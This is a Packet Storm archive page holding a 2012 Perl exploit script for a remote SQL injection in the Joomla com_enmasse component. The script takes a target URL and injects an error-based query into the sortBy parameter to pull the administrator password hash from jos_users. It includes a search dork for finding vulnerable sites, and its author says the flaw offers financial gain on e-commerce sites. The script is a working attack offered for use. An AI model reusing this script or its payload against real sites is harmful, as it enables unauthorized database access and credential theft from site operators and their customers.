what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Enmasse SQL Injection

Joomla Enmasse SQL Injection
Posted Aug 7, 2012
Authored by Daniel Barragan

Joomla Enmasse component remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | cf821d066145cc0aaa6bf61dac10e9bf55b1cb6536262dcf10639062c8982c56

Joomla Enmasse SQL Injection

Change Mirror Download
       

# Exploit Title: Joomla com_enmasse Remote Exploit

# Author: Daniel Barragan "D4NB4R"


# EspaƱol

# hola, este exploit afecta sitios de ecommerce por lo cual el exploit solo dara una muestra
# de la extraccion posible de datos, No me hago responsable del uso que se le de. ya que es
# posible obtener lucro economico por medio del mismo. El script esta hecho con tablas por
# defecto de joomla.

# English

# hi, this exploit affects ecommerce sites so the exploit only give a sample of the
# possible extraction of data, I am not responsible for any use that is given. since
# it is possible to obtain economic profit through this. the script is done with joomla default tables.



#!/usr/bin/perl -w

########################################
# Exploit Title: Joomla com_enmasse Remote Exploit
#
# Dork: inurl:index.php?option=com_enmasse
#
# Date: [06-08-2012]
#
# Author: Daniel Barragan "D4NB4R"
#
# Twitter: @D4NB4R
#
# site: http://poisonsecurity.wordpress.com/
#
# Vendor: http://www.matamko.com/
#
# Version: 1.2.0.4 (last update on Jul 27, 2012)
#
# License: Enmasse 6 Months Support & Subscription - USD$358.20
#
# Demo: http://www.matamko.com/products/filexpress/live-demo.html
#
# Tested on: [Linux(bt5)-Windows(7ultimate)]
#
# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc....
########################################

print "\t\t\n\n";
print "\t\n";
print "\t Daniel Barragan D4NB4R \n";
print "\t \n";
print "\t Joomla com_enmasse Remote Exploit \n";
print "\t\n\n";

use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";

chomp(my $target=<STDIN>);

$concatene="concat(password)";
$table="jos_users";
$d4nb4r="floor";
$com="com_enmasse";
$seleccione="select";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/) {

print "\n Hash Admin : $1\n\n";
print " El exploit fue exitoso si desea ver mas datos modifique el script\n";
print " The exploit was successful if you want to see more data modify the script\n";

}
else{print "\n[-] No se pudo, intente manualmente\n";}

#####Daniel Barragan D4NB4R 2012################
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close